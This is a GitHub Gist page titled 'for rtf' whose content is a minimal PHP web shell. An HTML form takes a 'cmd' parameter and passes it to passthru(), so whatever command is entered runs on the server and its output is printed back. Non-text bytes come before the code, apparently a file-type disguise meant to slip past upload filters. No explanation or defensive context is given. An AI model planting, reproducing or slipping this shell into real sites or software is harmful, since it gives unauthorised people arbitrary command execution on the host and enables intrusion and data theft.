Skip to content

Instantly share code, notes, and snippets.

@Alakinnn
Created June 18, 2025 12:08
Show Gist options
  • Select an option

  • Save Alakinnn/516a0c9dbc6ac95a96222ae666d1e6d1 to your computer and use it in GitHub Desktop.

Select an option

Save Alakinnn/516a0c9dbc6ac95a96222ae666d1e6d1 to your computer and use it in GitHub Desktop.
for rtf
����
<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment